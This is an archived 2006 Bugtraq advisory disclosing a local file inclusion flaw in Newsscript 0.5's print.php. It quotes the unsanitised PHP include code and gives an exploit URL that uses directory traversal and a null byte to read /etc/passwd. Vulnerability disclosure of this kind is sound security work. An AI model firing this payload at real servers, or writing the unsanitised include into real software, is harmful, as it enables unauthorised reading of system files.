Bugtraq mailing list archives

Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability

From: daftrix () gmail com
Date: 12 Sep 2006 03:06:19 -0000

# Subject:

--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "

# Vulnerable version:

--- "Newsscript version 0.5"



# Vendor URL:

--- Emaill - mail () webmaster-journal com
--- Website - http://webmaster-journal.com



# Available in:

---http://www.comscripts.com/scripts/php.wm-news.203.html



# Vulnerability:

--- Vulnerable code in print/print.php

--- $ide var is not sanitized and can be used to include files from local resources

--- 1       <html>
--- 2       <head>
--- 3       <?
--- 4         $file_name = "../".$ide.".txt";
--- 5       ?>
--- 
---
--- 27       include($file_name);



# Exploit:

--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00



# Discovered By:

--- Daftrix[at]Gmail.com
--- Daftrix Security Investigations
--- http://www.daftrix.com

Current thread:

Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability daftrix (Sep 12)